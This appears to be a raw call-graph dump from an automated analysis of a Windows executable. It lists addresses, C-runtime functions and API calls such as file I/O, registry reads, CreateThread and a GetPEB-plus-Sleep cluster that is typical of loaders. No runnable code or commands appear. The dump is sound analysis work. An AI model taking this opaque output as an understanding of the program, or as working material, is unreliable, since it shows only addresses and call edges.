105513->105515 105516 d70db6 105514->105516 105517 d70da9 105514->105517 105531 d70d6c __write 105515->105531 105520 d70dc3 105516->105520 105521 d70dd8 105516->105521 105519 d68af4 __write 59 API calls 105517->105519 105524 d68b28 ___wstrgtold12_l 59 API calls 105518->105524 105519->105518 105522 d68af4 __write 59 API calls 105520->105522 105523 d6d206 ___lock_fhandle 60 API calls 105521->105523 105525 d70dc8 105522->105525 105526 d70dde 105523->105526 105527 d70dd0 105524->105527 105528 d68b28 ___wstrgtold12_l 59 API calls 105525->105528 105529 d70e04 105526->105529 105530 d70df1 105526->105530 105533 d68db6 ___wstrgtold12_l 9 API calls 105527->105533 105528->105527 105534 d68b28 ___wstrgtold12_l 59 API calls 105529->105534 105532 d70e5b __read_nolock 71 API calls 105530->105532 105531->105463 105535 d70dfd 105532->105535 105533->105531 105536 d70e09 105534->105536 105538 d70e33 __read LeaveCriticalSection 105535->105538 105537 d68af4 __write 59 API calls 105536->105537 105537->105535 105538->105531 105539->105455 105540->105464 105541->105458 105545 d6520a GetSystemTimeAsFileTime 105542->105545 105544 da8f6e 105544->105135 105546 d65238 __aulldiv 105545->105546 105546->105544 105548 d65c6c __write 105547->105548 105549 d65c93 105548->105549 105550 d65c7e 105548->105550 105552 d66c11 __lock_file 60 API calls 105549->105552 105561 d68b28 59 API calls __getptd_noexit 105550->105561 105554 d65c99 105552->105554 105553 d65c83 105562 d68db6 9 API calls ___wstrgtold12_l 105553->105562 105563 d658d0 68 API calls 5 library calls 105554->105563 105557 d65ca4 105564 d65cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105557->105564 105558 d65c8e __write 105558->105140 105560 d65cb6 105560->105558 105561->105553 105562->105558 105563->105557 105564->105560 105565->104993 105582 d48740 105566->105582 105568 d489c3 105569 d48a3d 105568->105569 105570 d489cd 105568->105570 105591 d49d3c 61 API calls Mailbox 105569->105591 105571 d60db6 Mailbox 60 API calls 105570->105571 105573 d489de 105571->105573 105575 d489ec 105573->105575 105576 d47667 60 API calls 105573->105576 105574 d48a2d 105574->105000 105577 d489fb 105575->105577 105589 d47f77 60 API calls 2 library calls 105575->105589 105576->105575 105579 d60db6 Mailbox 60 API calls 105577->105579 105580 d48a05 105579->105580 105590 d48660 69 API calls 105580->105590 105583 d48921 105582->105583 105584 d48753 105582->105584 105583->105568 105585 d48764 105584->105585 105586 d47667 60 API calls 105584->105586 105585->105568 105587 d48983 105586->105587 105588 d62d40 __cinit 68 API calls 105587->105588 105588->105585 105589->105577 105590->105574 105591->105574 105592->105014 105593->105016 105594->105013 105595->105021 105597 d49169 Mailbox 105596->105597 105598 d7f19f 105597->105598 105603 d49173 105597->105603 105599 d60db6 Mailbox 60 API calls 105598->105599 105601 d7f1ab 105599->105601 105600 d4917a 105600->105027 105603->105600 105604 d49c90 60 API calls Mailbox 105603->105604 105604->105603 105605->105037 105606->105032 105612 da9748 __tzset_nolock _wcscmp 105607->105612 105608 d44f0b 75 API calls 105608->105612 105609 da95dc 105609->105043 105609->105071 105610 da9109 GetSystemTimeAsFileTime 105610->105612 105611 d44ee5 86 API calls 105611->105612 105612->105608 105612->105609 105612->105610 105612->105611 105614 da8b1f 105613->105614 105615 da8b11 105613->105615 105617 da8b64 105614->105617 105618 d6525b 116 API calls 105614->105618 105639 da8b28 105614->105639 105616 d6525b 116 API calls 105615->105616 105616->105614 105644 da8d91 105617->105644 105620 da8b49 105618->105620 105620->105617 105622 da8b52 105620->105622 105621 da8ba8 105623 da8bac 105621->105623 105624 da8bcd 105621->105624 105626 d653a6 __fcloseall 84 API calls 105622->105626 105622->105639 105625 da8bb9 105623->105625 105628 d653a6 __fcloseall 84 API calls 105623->105628 105648 da89a9 105624->105648 105630 d653a6 __fcloseall 84 API calls 105625->105630 105625->105639 105626->105639 105628->105625 105630->105639 105631 da8bfb 105657 da8c2b 105631->105657 105632 da8bdb 105634 da8be8 105632->105634 105635 d653a6 __fcloseall 84 API calls 105632->105635 105637 d653a6 __fcloseall 84 API calls 105634->105637 105634->105639 105635->105634 105637->105639 105639->105072 105641 da8c16 105641->105639 105643 d653a6 __fcloseall 84 API calls 105641->105643 105643->105639 105645 da8db6 105644->105645 105647 da8d9f __tzset_nolock _memmove 105644->105647 105646 d655e2 __fread_nolock 75 API calls 105645->105646 105646->105647 105647->105621 105649 d6571c __malloc_crt 59 API calls 105648->105649 105650 da89b8 105649->105650 105651 d6571c __malloc_crt 59 API calls 105650->105651 105652 da89cc 105651->105652 105653 d6571c __malloc_crt 59 API calls 105652->105653 105654 da89e0 105653->105654 105655 da8d0d 59 API calls 105654->105655 105656 da89f3 105654->105656 105655->105656 105656->105631 105656->105632 105661 da8c40 105657->105661 105658 da8cf8 105690 da8f35 105658->105690 105659 da8a05 75 API calls 105659->105661 105661->105658 105661->105659 105664 da8c02 105661->105664 105686 da8e12 105661->105686 105694 da8aa1 75 API calls 105661->105694 105665 da8d0d 105664->105665 105666 da8d1a 105665->105666 105668 da8d20 105665->105668 105667 d62d55 _free 59 API calls 105666->105667 105667->105668 105669 da8d31 105668->105669 105670 d62d55 _free 59 API calls 105668->105670 105671 da8c09 105669->105671 105672 d62d55 _free 59 API calls 105669->105672 105670->105669 105671->105641 105673 d653a6 105671->105673 105672->105671 105674 d653b2 __write 105673->105674 105675 d653c6 105674->105675 105676 d653de 105674->105676 105743 d68b28 59 API calls __getptd_noexit 105675->105743 105679 d66c11 __lock_file 60 API calls 105676->105679 105682 d653d6 __write 105676->105682 105678 d653cb 105744 d68db6 9 API calls ___wstrgtold12_l 105678->105744 105681 d653f0 105679->105681 105727 d6533a 105681->105727 105682->105641 105687 da8e61 105686->105687 105688 da8e21 105686->105688 105687->105688 105695 da8ee8 105687->105695 105688->105661 105691 da8f53 105690->105691 105692 da8f42 105690->105692 105691->105664 105693 d64863 81 API calls 105692->105693 105693->105691 105694->105661 105696 da8f25 105695->105696 105697 da8f14 105695->105697 105696->105687 105699 d64863 105697->105699 105700 d6486f __write 105699->105700 105701 d648a5 105700->105701 105702 d6488d 105700->105702 105704 d6489d __write 105700->105704 105705 d66c11 __lock_file 60 API calls 105701->105705 105724 d68b28 59 API calls __getptd_noexit 105702->105724 105704->105696 105707 d648ab 105705->105707 105706 d64892 105725 d68db6 9 API calls ___wstrgtold12_l 105706->105725 105712 d6470a 105707->105712 105715 d64719 105712->105715 105718 d64737 105712->105718 105713 d64727 105714 d68b28 ___wstrgtold12_l 59 API calls 105713->105714 105716 d6472c 105714->105716 105715->105713 105715->105718 105722 d64751 _memmove 105715->105722 105717 d68db6 ___wstrgtold12_l 9 API calls 105716->105717 105717->105718 105726 d648dd LeaveCriticalSection LeaveCriticalSection _fseek 105718->105726 105719 d6ae1e __flsbuf 79 API calls 105719->105722 105720 d64a3d __flush 79 API calls 105720->105722 105721 d646e6 __fclose_nolock 59 API calls 105721->105722 105722->105718 105722->105719 105722->105720 105722->105721 105723 d6d886 __write 79 API calls 105722->105723 105723->105722 105724->105706 105725->105704 105726->105704 105728 d6535d 105727->105728 105729 d65349 105727->105729 105731 d65359 105728->105731 105746 d64a3d 105728->105746 105782 d68b28 59 API calls __getptd_noexit 105729->105782 105745 d65415 LeaveCriticalSection LeaveCriticalSection _fseek 105731->105745 105732 d6534e 105783 d68db6 9 API calls ___wstrgtold12_l 105732->105783 105738 d646e6 __fclose_nolock 59 API calls 105739 d65377 105738->105739 105756 d70a02 105739->105756 105741 d6537d 105741->105731 105742 d62d55 _free 59 API calls 105741->105742 105742->105731 105743->105678 105744->105682 105745->105682 105747 d64a50 105746->105747 105751 d64a74 105746->105751 105748 d646e6 __fclose_nolock 59 API calls 105747->105748 105747->105751 105749 d64a6d 105748->105749 105784 d6d886 105749->105784 105752 d70b77 105751->105752 105753 d65371 105752->105753 105754 d70b84 105752->105754 105753->105738 105754->105753 105755 d62d55 _free 59 API calls 105754->105755 105755->105753 105757 d70a0e __write 105756->105757 105758 d70a32 105757->105758 105759 d70a1b 105757->105759 105761 d70abd 105758->105761 105763 d70a42 105758->105763 105909 d68af4 59 API calls __getptd_noexit 105759->105909 105914 d68af4 59 API calls __getptd_noexit 105761->105914 105762 d70a20 105910 d68b28 59 API calls __getptd_noexit 105762->105910 105766 d70a60 105763->105766 105767 d70a6a 105763->105767 105911 d68af4 59 API calls __getptd_noexit 105766->105911 105770 d6d206 ___lock_fhandle 60 API calls 105767->105770 105768 d70a65 105915 d68b28 59 API calls __getptd_noexit 105768->105915 105772 d70a70 105770->105772 105774 d70a83 105772->105774 105775 d70a8e 105772->105775 105773 d70ac9 105916 d68db6 9 API calls ___wstrgtold12_l 105773->105916 105894 d70add 105774->105894 105912 d68b28 59 API calls __getptd_noexit 105775->105912 105776 d70a27 __write 105776->105741 105780 d70a89 105913 d70ab5 LeaveCriticalSection __unlock_fhandle 105780->105913 105782->105732 105783->105731 105785 d6d892 __write 105784->105785 105786 d6d8b6 105785->105786 105787 d6d89f 105785->105787 105789 d6d955 105786->105789 105791 d6d8ca 105786->105791 105885 d68af4 59 API calls __getptd_noexit 105787->105885 105891 d68af4 59 API calls __getptd_noexit 105789->105891 105790 d6d8a4 105886 d68b28 59 API calls __getptd_noexit 105790->105886 105794 d6d8f2 105791->105794 105795 d6d8e8 105791->105795 105812 d6d206 105794->105812 105887 d68af4 59 API calls __getptd_noexit 105795->105887 105796 d6d8ed 105892 d68b28 59 API calls __getptd_noexit 105796->105892 105799 d6d8f8 105801 d6d91e 105799->105801 105802 d6d90b 105799->105802 105888 d68b28 59 API calls __getptd_noexit 105801->105888 105821 d6d975 105802->105821 105803 d6d961 105893 d68db6 9 API calls ___wstrgtold12_l 105803->105893 105804 d6d8ab __write 105804->105751 105808 d6d917 105890 d6d94d LeaveCriticalSection __unlock_fhandle 105808->105890 105809 d6d923 105889 d68af4 59 API calls __getptd_noexit 105809->105889 105813 d6d212 __write 105812->105813 105814 d6d261 EnterCriticalSection 105813->105814 105815 d69c0b __lock 59 API calls 105813->105815 105816 d6d287 __write 105814->105816 105817 d6d237 105815->105817 105816->105799 105818 d6d24f 105817->105818 105819 d69e2b __mtinitlocks InitializeCriticalSectionEx InitializeCriticalSectionAndSpinCount 105817->105819 105820 d6d28b ___lock_fhandle LeaveCriticalSection 105818->105820 105819->105818 105820->105814 105822 d6d982 __ftell_nolock 105821->105822 105823 d6d9e0 105822->105823 105824 d6d9c1 105822->105824 105852 d6d9b6 105822->105852 105828 d6da38 105823->105828 105829 d6da1c 105823->105829 105826 d68af4 __write 59 API calls 105824->105826 105825 d6c5f6 ___wstrgtold12_l 6 API calls 105830 d6e1d6 105825->105830 105827 d6d9c6 105826->105827 105831 d68b28 ___wstrgtold12_l 59 API calls 105827->105831 105832 d6da51 105828->105832 105835 d718c1 __lseeki64_nolock 61 API calls 105828->105835 105833 d68af4 __write 59 API calls 105829->105833 105830->105808 105834 d6d9cd 105831->105834 105836 d75c6b __flswbuf 59 API calls 105832->105836 105837 d6da21 105833->105837 105838 d68db6 ___wstrgtold12_l 9 API calls 105834->105838 105835->105832 105839 d6da5f 105836->105839 105840 d68b28 ___wstrgtold12_l 59 API calls 105837->105840 105838->105852 105841 d6ddb8 105839->105841 105846 d699ac __setmbcp 59 API calls 105839->105846 105842 d6da28 105840->105842 105843 d6ddd6 105841->105843 105844 d6e14b WriteFile 105841->105844 105845 d68db6 ___wstrgtold12_l 9 API calls 105842->105845 105847 d6defa 105843->105847 105856 d6ddec 105843->105856 105848 d6ddab GetLastError 105844->105848 105854 d6dd78 105844->105854 105845->105852 105849 d6da8b GetConsoleMode 105846->105849 105858 d6df05 105847->105858 105862 d6dfef 105847->105862 105848->105854 105849->105841 105851 d6daca 105849->105851 105850 d6e184 105850->105852 105853 d68b28 ___wstrgtold12_l 59 API calls 105850->105853 105851->105841 105855 d6dada GetConsoleCP 105851->105855 105852->105825 105860 d6e1b2 105853->105860 105854->105850 105854->105852 105861 d6ded8 105854->105861 105855->105850 105883 d6db09 105855->105883 105856->105850 105857 d6de5b WriteFile 105856->105857 105857->105848 105859 d6de98 105857->105859 105858->105850 105863 d6df6a WriteFile 105858->105863 105859->105856 105864 d6debc 105859->105864 105865 d68af4 __write 59 API calls 105860->105865 105866 d6dee3 105861->105866 105867 d6e17b 105861->105867 105862->105850 105868 d6e064 WideCharToMultiByte 105862->105868 105863->105848 105869 d6dfb9 105863->105869 105864->105854 105865->105852 105870 d68b28 ___wstrgtold12_l 59 API calls 105866->105870 105871 d68b07 __dosmaperr 59 API calls 105867->105871 105868->105848 105877 d6e0ab 105868->105877 105869->105854 105869->105858 105869->105864 105873 d6dee8 105870->105873 105871->105852 105872 d6e0b3 WriteFile 105875 d6e106 GetLastError 105872->105875 105872->105877 105876 d68af4 __write 59 API calls 105873->105876 105874 d635f5 __write_nolock 59 API calls 105874->105883 105875->105877 105876->105852 105877->105854 105877->105862 105877->105864 105877->105872 105878 d762ba 61 API calls __write_nolock 105878->105883 105879 d6dbf2 WideCharToMultiByte 105879->105854 105880 d6dc2d WriteFile 105879->105880 105880->105848 105882 d6dc5f 105880->105882 105881 d77a5e WriteConsoleW CreateFileW __putwch_nolock 105881->105882 105882->105848 105882->105854 105882->105881 105882->105883 105884 d6dc87 WriteFile 105882->105884 105883->105854 105883->105874 105883->105878 105883->105879 105883->105882 105884->105848 105884->105882 105885->105790 105886->105804 105887->105796 105888->105809 105889->105808 105890->105804 105891->105796 105892->105803 105893->105804 105917 d6d4c3 105894->105917 105896 d70b41 105930 d6d43d 60 API calls 2 library calls 105896->105930 105897 d70aeb 105897->105896 105899 d6d4c3 __lseek_nolock 59 API calls 105897->105899 105908 d70b1f 105897->105908 105903 d70b16 105899->105903 105900 d6d4c3 __lseek_nolock 59 API calls 105904 d70b2b CloseHandle 105900->105904 105901 d70b49 105902 d70b6b 105901->105902 105931 d68b07 59 API calls 3 library calls 105901->105931 105902->105780 105906 d6d4c3 __lseek_nolock 59 API calls 105903->105906 105904->105896 105907 d70b37 GetLastError 105904->105907 105906->105908 105907->105896 105908->105896 105908->105900 105909->105762 105910->105776 105911->105768 105912->105780 105913->105776 105914->105768 105915->105773 105916->105776 105918 d6d4ce 105917->105918 105922 d6d4e3 105917->105922 105919 d68af4 __write 59 API calls 105918->105919 105921 d6d4d3 105919->105921 105920 d68af4 __write 59 API calls 105923 d6d512 105920->105923 105924 d68b28 ___wstrgtold12_l 59 API calls 105921->105924 105922->105920 105925 d6d508 105922->105925 105926 d68b28 ___wstrgtold12_l 59 API calls 105923->105926 105927 d6d4db 105924->105927 105925->105897 105928 d6d51a 105926->105928 105927->105897 105929 d68db6 ___wstrgtold12_l 9 API calls 105928->105929 105929->105927 105930->105901 105931->105902 105994 d71940 105932->105994 105935 d4477c 105938 d47bcc 60 API calls 105935->105938 105936 d44799 106000 d47d8c 105936->106000 105939 d44788 105938->105939 105996 d47726 105939->105996 105942 d60791 105943 d6079e __ftell_nolock 105942->105943 105944 d6079f GetLongPathNameW 105943->105944 105945 d47bcc 60 API calls 105944->105945 105946 d472bd 105945->105946 105947 d4700b 105946->105947 105948 d47667 60 API calls 105947->105948 105949 d4701d 105948->105949 105950 d44750 61 API calls 105949->105950 105951 d47028 105950->105951 105952 d47033 105951->105952 105956 d7e885 105951->105956 105953 d43f74 60 API calls 105952->105953 105955 d4703f 105953->105955 106008 d434c2 105955->106008 105958 d7e89f 105956->105958 106014 d47908 62 API calls 105956->106014 105959 d47052 Mailbox 105959->104761 105961 d44ddd 137 API calls 105960->105961 105962 d4688f 105961->105962 105963 d7e031 105962->105963 105965 d44ddd 137 API calls 105962->105965 105964 da955b 123 API calls 105963->105964 105966 d7e046 105964->105966 105967 d468a3 105965->105967 105968 d7e067 105966->105968 105969 d7e04a 105966->105969 105967->105963 105970 d468ab 105967->105970 105972 d60db6 Mailbox 60 API calls 105968->105972 105971 d44e4a 85 API calls 105969->105971 105973 d468b7 105970->105973 105974 d7e052 105970->105974 105971->105974 105993 d7e0ac Mailbox 105972->105993 106015 d46a8c 105973->106015 106108 da42f8 91 API calls _wprintf 105974->106108 105977 d7e060 105977->105968 105979 d7e260 105980 d62d55 _free 59 API calls 105979->105980 105981 d7e268 105980->105981 105982 d44e4a 85 API calls 105981->105982 105987 d7e271 105982->105987 105986 d62d55 _free 59 API calls 105986->105987 105987->105986 105989 d44e4a 85 API calls 105987->105989 106114 d9f7a1 90 API calls 4 library calls 105987->106114 105989->105987 105990 d47de1 60 API calls 105990->105993 105993->105979 105993->105987 105993->105990 106109 d9f73d 60 API calls 2 library calls 105993->106109 106110 d9f65e 62 API calls 2 library calls 105993->106110 106111 da737f 60 API calls Mailbox 105993->106111 106112 d4750f 60 API calls 2 library calls 105993->106112 106113 d4735d 60 API calls Mailbox 105993->106113 105995 d4475d GetFullPathNameW 105994->105995 105995->105935 105995->105936 105997 d47734 105996->105997 106004 d47d2c 105997->106004 105999 d44794 105999->105942 106001 d47da6 106000->106001 106003 d47d99 106000->106003 106002 d60db6 Mailbox 60 API calls 106001->106002 106002->106003 106003->105939 106005 d47d43 _memmove 106004->106005 106006 d47d3a 106004->106006 106005->105999 106006->106005 106007 d47e4f 60 API calls 106006->106007 106007->106005 106009 d434d4 106008->106009 106013 d434f3 _memmove 106008->106013 106011 d60db6 Mailbox 60 API calls 106009->106011 106010 d60db6 Mailbox 60 API calls 106012 d4350a 106010->106012 106011->106013 106012->105959 106013->106010 106014->105956 106016 d46ab5 106015->106016 106017 d7e41e 106015->106017 106120 d457a6 61 API calls Mailbox 106016->106120 106206 d9f7a1 90 API calls 4 library calls 106017->106206 106020 d7e431 106207 d9f7a1 90 API calls 4 library calls 106020->106207 106021 d46ad7 106121 d457f6 106021->106121 106024 d46af4 106026 d47667 60 API calls 106024->106026 106028 d46b00 106026->106028 106027 d7e44d 106030 d46b61 106027->106030 106134 d60957 61 API calls __ftell_nolock 106028->106134 106032 d7e460 106030->106032 106033 d46b6f 106030->106033 106031 d46b0c 106035 d47667 60 API calls 106031->106035 106036 d45c6f CloseHandle 106032->106036 106034 d47667 60 API calls 106033->106034 106037 d46b78 106034->106037 106038 d46b18 106035->106038 106039 d7e46c 106036->106039 106040 d47667 60 API calls 106037->106040 106041 d44750 61 API calls 106038->106041 106042 d44ddd 137 API calls 106039->106042 106044 d46b81 106040->106044 106045 d46b26 106041->106045 106043 d7e488 106042->106043 106046 d7e4b1 106043->106046 106049 da955b 123 API calls 106043->106049 106144 d4459b 106044->106144 106135 d45850 ReadFile SetFilePointerEx 106045->106135 106208 d9f7a1 90 API calls 4 library calls 106046->106208 106053 d7e4a4 106049->106053 106050 d46b98 106054 d47b2e 60 API calls 106050->106054 106052 d46b52 106136 d45aee 106052->106136 106057 d7e4cd 106053->106057 106058 d7e4ac 106053->106058 106059 d46ba9 SetCurrentDirectoryW 106054->106059 106055 d7e4c8 106087 d46d0c Mailbox 106055->106087 106061 d44e4a 85 API calls 106057->106061 106060 d44e4a 85 API calls 106058->106060 106064 d46bbc Mailbox 106059->106064 106060->106046 106062 d7e4d2 106061->106062 106063 d60db6 Mailbox 60 API calls 106062->106063 106069 d7e506 106063->106069 106066 d60db6 Mailbox 60 API calls 106064->106066 106068 d46bcf 106066->106068 106067 d43bbb 106067->104623 106067->104645 106070 d4522e 60 API calls 106068->106070 106209 d4750f 60 API calls 2 library calls 106069->106209 106084 d46bda Mailbox __wsetenvp 106070->106084 106072 d46ce7 106074 d7e740 106215 da72df 60 API calls Mailbox 106074->106215 106077 d7e54f Mailbox 106077->106074 106099 d47de1 60 API calls 106077->106099 106102 d7e792 106077->106102 106210 d9f73d 60 API calls 2 library calls 106077->106210 106211 d9f65e 62 API calls 2 library calls 106077->106211 106212 da737f 60 API calls Mailbox 106077->106212 106213 d4750f 60 API calls 2 library calls 106077->106213 106214 d47213 60 API calls Mailbox 106077->106214 106080 d7e762 106216 dbfbce 60 API calls 2 library calls 106080->106216 106083 d7e76f 106085 d62d55 _free 59 API calls 106083->106085 106084->106072 106091 d7e7d1 106084->106091 106093 d47de1 60 API calls 106084->106093 106096 d7e7d9 106084->106096 106195 d4586d 68 API calls _wcscpy 106084->106195 106196 d46f5d GetStringTypeW 106084->106196 106197 d46ecc 61 API calls __wcsnicmp 106084->106197 106198 d46faa GetStringTypeW __wsetenvp 106084->106198 106199 d6363d GetStringTypeW _iswctype 106084->106199 106200 d468dc 166 API calls 3 library calls 106084->106200 106201 d47213 60 API calls Mailbox 106084->106201 106085->106087 106115 d457d4 106087->106115 106218 d9f5f7 60 API calls 4 library calls 106091->106218 106093->106084 106219 d9f7a1 90 API calls 4 library calls 106096->106219 106099->106077 106217 d9f7a1 90 API calls 4 library calls 106102->106217 106105 d7e7ab 106106 d62d55 _free 59 API calls 106105->106106 106107 d7e7be 106106->106107 106107->106087 106108->105977 106109->105993 106110->105993 106111->105993 106112->105993 106113->105993 106114->105987 106116 d45c6f CloseHandle 106115->106116 106117 d457dc Mailbox 106116->106117 106118 d45c6f CloseHandle 106117->106118 106119 d457eb 106118->106119 106119->106067 106120->106021 106122 d45c6f CloseHandle 106121->106122 106123 d45802 106122->106123 106220 d45c99 106123->106220 106125 d45821 106126 d45844 106125->106126 106228 d45610 106125->106228 106126->106020 106126->106024 106128 d45833 106245 d4527b SetFilePointerEx SetFilePointerEx 106128->106245 106130 d7dc07 106246 da345a SetFilePointerEx SetFilePointerEx WriteFile 106130->106246 106131 d4583a 106131->106126 106131->106130 106133 d7dc37 106133->106126 106134->106031 106135->106052 106143 d45b08 106136->106143 106137 d45b8f SetFilePointerEx 106259 d45c4e SetFilePointerEx 106137->106259 106138 d7dd28 106260 d45c4e SetFilePointerEx 106138->106260 106141 d7dd42 106142 d45b63 106142->106030 106143->106137 106143->106138 106143->106142 106145 d47667 60 API calls 106144->106145 106146 d445b1 106145->106146 106147 d47667 60 API calls 106146->106147 106148 d445b9 106147->106148 106149 d47667 60 API calls 106148->106149 106150 d445c1 106149->106150 106151 d47667 60 API calls 106150->106151 106152 d445c9 106151->106152 106153 d7d4d2 106152->106153 106154 d445fd 106152->106154 106155 d48047 60 API calls 106153->106155 106156 d4784b 60 API calls 106154->106156 106157 d7d4db 106155->106157 106158 d4460b 106156->106158 106159 d47d8c 60 API calls 106157->106159 106160 d47d2c 60 API calls 106158->106160 106163 d44640 106159->106163 106161 d44615 106160->106161 106161->106163 106164 d4784b 60 API calls 106161->106164 106162 d44680 106261 d4784b 106162->106261 106163->106162 106166 d4465f 106163->106166 106176 d7d4fb 106163->106176 106167 d44636 106164->106167 106170 d479f2 60 API calls 106166->106170 106169 d47d2c 60 API calls 106167->106169 106168 d7d5cb 106172 d47bcc 60 API calls 106168->106172 106169->106163 106173 d44669 106170->106173 106171 d44691 106174 d446a3 106171->106174 106177 d48047 60 API calls 106171->106177 106190 d7d588 106172->106190 106173->106162 106181 d4784b 60 API calls 106173->106181 106175 d446b3 106174->106175 106178 d48047 60 API calls 106174->106178 106180 d446ba 106175->106180 106182 d48047 60 API calls 106175->106182 106176->106168 106179 d7d5b4 106176->106179 106189 d7d532 106176->106189 106177->106174 106178->106175 106179->106168 106185 d7d59f 106179->106185 106183 d48047 60 API calls 106180->106183 106192 d446c1 Mailbox 106180->106192 106181->106162 106182->106180 106183->106192 106184 d479f2 60 API calls 106184->106190 106188 d47bcc 60 API calls 106185->106188 106186 d7d590 106187 d47bcc 60 API calls 106186->106187 106187->106190 106188->106190 106189->106186 106193 d7d57b 106189->106193 106190->106162 106190->106184 106274 d47924 60 API calls 2 library calls 106190->106274 106192->106050 106194 d47bcc 60 API calls 106193->106194 106194->106190 106195->106084 106196->106084 106197->106084 106198->106084 106199->106084 106200->106084 106201->106084 106206->106020 106207->106027 106208->106055 106209->106077 106210->106077 106211->106077 106212->106077 106213->106077 106214->106077 106215->106080 106216->106083 106217->106105 106218->106096 106221 d45cb2 CreateFileW 106220->106221 106222 d7dd58 106220->106222 106223 d45cd4 106221->106223 106222->106223 106224 d7dd5e CreateFileW 106222->106224 106223->106125 106224->106223 106225 d7dd84 106224->106225 106226 d45aee 2 API calls 106225->106226 106227 d7dd8f 106226->106227 106227->106223 106229 d7dba5 106228->106229 106230 d4562b 106228->106230 106244 d456ba 106229->106244 106253 d45cdf 106229->106253 106231 d45aee 2 API calls 106230->106231 106230->106244 106232 d4564d 106231->106232 106233 d4522e 60 API calls 106232->106233 106235 d45657 106233->106235 106235->106229 106236 d45664 106235->106236 106237 d60db6 Mailbox 60 API calls 106236->106237 106238 d4566f 106237->106238 106239 d4522e 60 API calls 106238->106239 106240 d4567a 106239->106240 106247 d45bc0 106240->106247 106242 d456a7 106243 d45aee 2 API calls 106242->106243 106243->106244 106244->106128 106245->106131 106246->106133 106248 d45c33 106247->106248 106249 d45bce 106247->106249 106258 d45c4e SetFilePointerEx 106248->106258 106250 d45bf6 106249->106250 106252 d45c06 ReadFile 106249->106252 106250->106242 106252->106249 106252->106250 106254 d45aee 2 API calls 106253->106254 106255 d45d00 106254->106255 106256 d45aee 2 API calls 106255->106256 106257 d45d14 106256->106257 106257->106244 106258->106249 106259->106142 106260->106141 106262 d478b7 106261->106262 106263 d4785a 106261->106263 106265 d47d2c 60 API calls 106262->106265 106263->106262 106264 d47865 106263->106264 106267 d47880 106264->106267 106268 d7eb09 106264->106268 106266 d47888 _memmove 106265->106266 106266->106171 106275 d47f27 60 API calls Mailbox 106267->106275 106276 d48029 106268->106276 106271 d7eb13 106272 d60db6 Mailbox 60 API calls 106271->106272 106273 d7eb33 106272->106273 106274->106190 106275->106266 106277 d60db6 Mailbox 60 API calls 106276->106277 106278 d48033 106277->106278 106278->106271 106279->104772 106281 d46d95 106280->106281 106286 d46ea9 106280->106286 106282 d60db6 Mailbox 60 API calls 106281->106282 106281->106286 106284 d46dbc 106282->106284 106283 d60db6 Mailbox 60 API calls 106290 d46e31 106283->106290 106284->106283 106286->104776 106290->106286 106293 d46240 106290->106293 106318 d4735d 60 API calls Mailbox 106290->106318 106319 d96553 60 API calls Mailbox 106290->106319 106320 d4750f 60 API calls 2 library calls 106290->106320 106291->104778 106292->104780 106321 d47a16 106293->106321 106295 d4646a 106328 d4750f 60 API calls 2 library calls 106295->106328 106300 d7dff6 106331 d9f8aa 92 API calls 4 library calls 106300->106331 106301 d4750f 60 API calls 106312 d46265 106301->106312 106306 d47d8c 60 API calls 106306->106312 106309 d46799 _memmove 106333 d9f8aa 92 API calls 4 library calls 106309->106333 106310 d7df92 106311 d48029 60 API calls 106310->106311 106313 d7df9d 106311->106313 106312->106295 106312->106300 106312->106301 106312->106306 106312->106309 106312->106310 106315 d47e4f 60 API calls 106312->106315 106326 d45f6c 61 API calls 106312->106326 106327 d45d41 60 API calls Mailbox 106312->106327 106329 d45e72 61 API calls 106312->106329 106330 d47924 60 API calls 2 library calls 106312->106330 106316 d4643b CharUpperBuffW 106315->106316 106316->106312 106318->106290 106319->106290 106320->106290 106322 d60db6 Mailbox 60 API calls 106321->106322 106323 d47a3b 106322->106323 106324 d48029 60 API calls 106323->106324 106325 d47a4a 106324->106325 106325->106312 106326->106312 106327->106312 106329->106312 106330->106312 106334->104794 106335->104795 106337 d44196 106336->106337 106338 d7d423 106336->106338 106338->106337 106426->104823 106907 993eb8 106921 991b08 106907->106921 106909 993f6a 106924 993da8 106909->106924 106927 994f98 GetPEB 106921->106927 106923 992193 106923->106909 106925 993db1 Sleep 106924->106925 106926 993dbf 106925->106926 106928 994fc2 106927->106928 106928->106923 106929 d41055 106934 d42649 106929->106934 106932 d62d40 __cinit 68 API calls 106933 d41064 106932->106933 106935 d47667 60 API calls 106934->106935 106936 d426b7 106935->106936 106941 d43582 106936->106941 106939 d42754 106940 d4105a 106939->106940 106944 d43416 106939->106944 106940->106932 106950 d435b0 106941->106950 106945 d4344e 106944->106945 106949 d43428 _memmove 106944->106949 106948 d60db6 Mailbox 60 API calls 106945->106948 106946 d60db6 Mailbox 60 API calls 106947 d4342e 106946->106947 106947->106939 106948->106949 106949->106946 106951 d435bd 106950->106951 106952 d435a1 106950->106952 106951->106952 106953 d435c4 RegOpenKeyExW 106951->106953 106952->106939 106953->106952 106954 d435de RegQueryValueExW 106953->106954 106955 d43614 RegCloseKey 106954->106955 106956 d435ff 106954->106956 106955->106952 106956->106955 106957 d41066 106962 d4f76f 106957->106962 106959 d4106c 106960 d62d40 __cinit 68 API calls 106959->106960 106961 d41076 106960->106961 106963 d4f790 106962->106963 106995 d5ff03 106963->106995 106967 d4f7d7 106968 d47667 60 API calls 106967->106968 106969 d4f7e1 106968->106969 106970 d47667 60 API calls 106969->106970 106971 d4f7eb 106970->106971 106972 d47667 60 API calls 106971->106972 106973 d4f7f5 106972->106973 106974 d47667 60 API calls 106973->106974 106975 d4f833 106974->106975 106976 d47667 60 API calls 106975->106976 106977 d4f8fe 106976->106977 107005 d55f87 106977->107005 106981 d4f930 106982 d47667 60 API calls 106981->106982 106983 d4f93a 106982->106983 107033 d5fd9e 106983->107033 106985 d4f981 106986 d4f991 GetStdHandle 106985->106986 106987 d845ab 106986->106987 106988 d4f9dd 106986->106988 106987->106988 106990 d845b4 106987->106990 106989 d4f9e5 OleInitialize 106988->106989 106989->106959 107040 da6b38 65 API calls Mailbox 106990->107040 106992 d845bb 107041 da7207 CreateThread 106992->107041 106994 d845c7 CloseHandle 106994->106989 107042 d5ffdc 106995->107042 106998 d5ffdc 60 API calls 106999 d5ff45 106998->106999 107000 d47667 60 API calls 106999->107000 107001 d5ff51 107000->107001 107002 d47bcc 60 API calls 107001->107002 107003 d4f796 107002->107003 107004 d60162 6 API calls 107003->107004 107004->106967 107006 d47667 60 API calls 107005->107006 107007 d55f97 107006->107007 107008 d47667 60 API calls 107007->107008 107009 d55f9f 107008->107009 107049 d55a9d 107009->107049 107012 d55a9d 60 API calls 107013 